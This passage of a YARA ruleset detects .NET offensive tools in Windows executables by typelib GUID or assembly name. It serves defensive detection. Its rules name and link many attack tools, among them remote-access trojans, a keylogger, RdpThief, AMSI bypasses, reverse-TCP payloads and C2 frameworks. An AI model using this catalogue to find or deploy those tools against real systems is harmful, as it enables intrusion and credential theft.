"8bb6f5b4-e7c7-4554-afd1-48f368774837" ascii nocase wide $typelibguid2 = "983ae28c-91c3-4072-8cdf-698b2ff7a967" ascii nocase wide $typelibguid3 = "9ac18cdc-3711-4719-9cfb-5b5f2d51fd5a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PlasmaRAT { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/mwsrc/PlasmaRAT" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "b8a2147c-074c-46e1-bb99-c8431a6546ce" ascii nocase wide $typelibguid1 = "0fcfde33-213f-4fb6-ac15-efb20393d4f3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Lime_RAT { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Lime-RAT" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "e58ac447-ab07-402a-9c96-95e284a76a8d" ascii nocase wide $typelibguid1 = "8fb35dab-73cd-4163-8868-c4dbcbdf0c17" ascii nocase wide $typelibguid2 = "37845f5b-35fe-4dce-bbec-2d07c7904fb0" ascii nocase wide $typelibguid3 = "83c453cf-0d29-4690-b9dc-567f20e63894" ascii nocase wide $typelibguid4 = "8b1f0a69-a930-42e3-9c13-7de0d04a4add" ascii nocase wide $typelibguid5 = "eaaeccf6-75d2-4616-b045-36eea09c8b28" ascii nocase wide $typelibguid6 = "5b2ec674-0aa4-4209-94df-b6c995ad59c4" ascii nocase wide $typelibguid7 = "e2cc7158-aee6-4463-95bf-fb5295e9e37a" ascii nocase wide $typelibguid8 = "d04ecf62-6da9-4308-804a-e789baa5cc38" ascii nocase wide $typelibguid9 = "8026261f-ac68-4ccf-97b2-3b55b7d6684d" ascii nocase wide $typelibguid10 = "212cdfac-51f1-4045-a5c0-6e638f89fce0" ascii nocase wide $typelibguid11 = "c1b608bb-7aed-488d-aa3b-0c96625d26c0" ascii nocase wide $typelibguid12 = "4c84e7ec-f197-4321-8862-d5d18783e2fe" ascii nocase wide $typelibguid13 = "3fc17adb-67d4-4a8d-8770-ecfd815f73ee" ascii nocase wide $typelibguid14 = "f1ab854b-6282-4bdf-8b8b-f2911a008948" ascii nocase wide $typelibguid15 = "aef6547e-3822-4f96-9708-bcf008129b2b" ascii nocase wide $typelibguid16 = "a336f517-bca9-465f-8ff8-2756cfd0cad9" ascii nocase wide $typelibguid17 = "5de018bd-941d-4a5d-bed5-fbdd111aba76" ascii nocase wide $typelibguid18 = "bbfac1f9-cd4f-4c44-af94-1130168494d0" ascii nocase wide $typelibguid19 = "1c79cea1-ebf3-494c-90a8-51691df41b86" ascii nocase wide $typelibguid20 = "927104e1-aa17-4167-817c-7673fe26d46e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_njRAT { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/mwsrc/njRAT" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "5a542c1b-2d36-4c31-b039-26a88d3967da" ascii nocase wide $typelibguid1 = "6b07082a-9256-42c3-999a-665e9de49f33" ascii nocase wide $typelibguid2 = "c0a9a70f-63e8-42ca-965d-73a1bc903e62" ascii nocase wide $typelibguid3 = "70bd11de-7da1-4a89-b459-8daacc930c20" ascii nocase wide $typelibguid4 = "fc790ee5-163a-40f9-a1e2-9863c290ff8b" ascii nocase wide $typelibguid5 = "cb3c28b2-2a4f-4114-941c-ce929fec94d3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Manager { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TheWover/Manager" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "dda73ee9-0f41-4c09-9cad-8215abd60b33" ascii nocase wide $typelibguid1 = "6a0f2422-d4d1-4b7e-84ad-56dc0fd2dfc5" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_neo_ConfuserEx { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/XenocodeRCE/neo-ConfuserEx" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "e98490bb-63e5-492d-b14e-304de928f81a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpAllowedToAct { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/pkb1s/SharpAllowedToAct" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "dac5448a-4ad1-490a-846a-18e4e3e0cf9a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SuperSQLInjectionV1 { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/shack2/SuperSQLInjectionV1" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "d5688068-fc89-467d-913f-037a785caca7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ADSearch { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/tomcarver16/ADSearch" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "4da5f1b7-8936-4413-91f7-57d6e072b4a7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_privilege_escalation_awesome_scripts_suite { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "1928358e-a64b-493f-a741-ae8e3d029374" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CVE_2020_1206_POC { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/ZecOps/CVE-2020-1206-POC" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "3523ca04-a12d-4b40-8837-1a1d28ef96de" ascii nocase wide $typelibguid1 = "d3a2f24a-ddc6-4548-9b3d-470e70dbcaab" ascii nocase wide $typelibguid2 = "fb30ee05-4a35-45f7-9a0a-829aec7e47d9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DInvoke { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TheWover/DInvoke" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "b77fdab5-207c-4cdb-b1aa-348505c54229" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpChisel { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/shantanu561993/SharpChisel" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "f5f21e2d-eb7e-4146-a7e1-371fd08d6762" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpScribbles { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/V1V1/SharpScribbles" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "aa61a166-31ef-429d-a971-ca654cd18c3b" ascii nocase wide $typelibguid1 = "0dc1b824-c6e7-4881-8788-35aecb34d227" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpReg { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpReg" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "8ef25b00-ed6a-4464-bdec-17281a4aa52f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_MemeVM { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TobitoFatitoRE/MemeVM" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "ef18f7f2-1f03-481c-98f9-4a18a2f12c11" ascii nocase wide $typelibguid1 = "77b2c83b-ca34-4738-9384-c52f0121647c" ascii nocase wide $typelibguid2 = "14d5d12e-9a32-4516-904e-df3393626317" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpDir { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpDir" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "c7a07532-12a3-4f6a-a342-161bb060b789" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AtYourService { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/mitchmoser/AtYourService" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "bc72386f-8b4c-44de-99b7-b06a8de3ce3f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LockLess { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/LockLess" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "a91421cb-7909-4383-ba43-c2992bbbac22" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EasyNet { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TheWover/EasyNet" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "3097d856-25c2-42c9-8d59-2cdad8e8ea12" ascii nocase wide $typelibguid1 = "ba33f716-91e0-4cf7-b9bd-b4d558f9a173" ascii nocase wide $typelibguid2 = "37d6dd3f-5457-4d8b-a2e1-c7b156b176e5" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpByeBear { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/S3cur3Th1sSh1t/SharpByeBear" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "a6b84e35-2112-4df2-a31b-50fde4458c5e" ascii nocase wide $typelibguid1 = "3e82f538-6336-4fff-aeec-e774676205da" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpHide { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/outflanknl/SharpHide" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "443d8cbf-899c-4c22-b4f6-b7ac202d4e37" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSvc { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpSvc" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "52856b03-5acd-45e0-828e-13ccb16942d1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCrashEventLog { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/slyd0g/SharpCrashEventLog" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "98cb495f-4d47-4722-b08f-cefab2282b18" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DotNetToJScript_LanguageModeBreakout { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/FuzzySecurity/DotNetToJScript-LanguageModeBreakout" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "deadb33f-fa94-41b5-813d-e72d8677a0cf" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharPermission { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/mitchmoser/SharPermission" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "84d2b661-3267-49c8-9f51-8f72f21aea47" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RegistryStrikesBack { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/RegistryStrikesBack" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "90ebd469-d780-4431-9bd8-014b00057665" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CloneVault { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/CloneVault" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "0a344f52-6780-4d10-9a4a-cb9439f9d3de" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_donut { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TheWover/donut" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "98ca74c7-a074-434d-9772-75896e73ceaa" ascii nocase wide $typelibguid1 = "3c9a6b88-bed2-4ba8-964c-77ec29bf1846" ascii nocase wide $typelibguid2 = "4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2" ascii nocase wide $typelibguid3 = "361c69f5-7885-4931-949a-b91eeab170e3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpHandler { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/jfmaes/SharpHandler" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "46e39aed-0cff-47c6-8a63-6826f147d7bd" ascii nocase wide $typelibguid1 = "11dc83c6-8186-4887-b228-9dc4fd281a23" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Driver_Template { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/FuzzySecurity/Driver-Template" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "bdb79ad6-639f-4dc2-8b8a-cd9107da3d69" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_NashaVM { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/Mrakovic-ORG/NashaVM" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "f9e63498-6e92-4afd-8c13-4f63a3d964c3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ // low hanging fruits ;) rule HKTL_NET_NAME_FakeFileMaker { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/FakeFileMaker" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "FakeFileMaker" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_Aggressor { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/k8gege/Aggressor" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "Aggressor" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_pentestscripts { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/c4bbage/pentestscripts" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "pentestscripts" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_WMIPersistence { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/mdsecactivebreach/WMIPersistence" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "WMIPersistence" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_ADCollector { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/dev-2null/ADCollector" hash = "5391239f479c26e699b6f3a1d6a0a8aa1a0cf9a8" hash = "9dd0f322dd57b906da1e543c44e764954704abae" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "ADCollector" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_MaliciousClickOnceGenerator { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Mr-Un1k0d3r/MaliciousClickOnceGenerator" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "MaliciousClickOnceGenerator" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_directInjectorPOC { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/badBounty/directInjectorPOC" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "directInjectorPOC" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_AsStrongAsFuck { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Charterino/AsStrongAsFuck" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "AsStrongAsFuck" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_MagentoScanner { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/soufianetahiri/MagentoScanner" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "MagentoScanner" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RevengeRAT_Stub_CSsharp { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/NYAN-x-CAT/RevengeRAT-Stub-CSsharp" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RevengeRAT-Stub-CSsharp" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharPyShell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/antonioCoco/SharPyShell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharPyShell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_GhostLoader { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/TheWover/GhostLoader" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "GhostLoader" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_DotNetInject { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/dtrizna/DotNetInject" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "DotNetInject" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_ATPMiniDump { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/b4rtik/ATPMiniDump" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "ATPMiniDump" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_ConfuserEx { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/yck1509/ConfuserEx" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "ConfuserEx" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharpBuster { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/passthehashbrowns/SharpBuster" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharpBuster" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_AmsiBypass { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/0xB455/AmsiBypass" hash = "8fa4ba512b34a898c4564a8eac254b6a786d195b" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "AmsiBypass" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_Recon_AD { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/outflanknl/Recon-AD" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "Recon-AD" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharpWatchdogs { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/RITRedteam/SharpWatchdogs" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharpWatchdogs" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharpCat { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Cn33liz/SharpCat" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharpCat" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_aspnetcore_bypassing_authentication { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/jackowild/aspnetcore-bypassing-authentication" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "aspnetcore-bypassing-authentication" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_K8tools { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/k8gege/K8tools" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "K8tools" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_HTTPSBeaconShell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/limbenjamin/HTTPSBeaconShell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "HTTPSBeaconShell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_Ghostpack_CompiledBinaries { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/r3motecontrol/Ghostpack-CompiledBinaries" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "Ghostpack-CompiledBinaries" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_metasploit_sharp { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/VolatileMindsLLC/metasploit-sharp" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "metasploit-sharp" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_trevorc2 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/trustedsec/trevorc2" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "trevorc2" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_petaqc2 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/fozavci/petaqc2" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "petaqc2" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_DNS2 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_DNS2" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_DNS2" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_cve_2017_7269_tool { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/zcgonvh/cve-2017-7269-tool" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "cve-2017-7269-tool" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_AggressiveProxy { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/EncodeGroup/AggressiveProxy" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "AggressiveProxy" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_MSBuildAPICaller { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/rvrsh3ll/MSBuildAPICaller" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "MSBuildAPICaller" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_GrayKeylogger { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DarkSecDevelopers/GrayKeylogger" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "GrayKeylogger" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_weevely3 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/epinna/weevely3" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "weevely3" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_FudgeC2 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Ziconius/FudgeC2" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "FudgeC2" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_Reverse_tcp { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_Reverse_tcp" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharpHose { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/ustayready/SharpHose" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharpHose" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RAT_NjRat_0_7d_modded_source_code { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RAT-NjRat-0.7d-modded-source-code" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RdpThief { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/0x09AL/RdpThief" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RdpThief" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RunasCs { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/antonioCoco/RunasCs" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RunasCs" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and 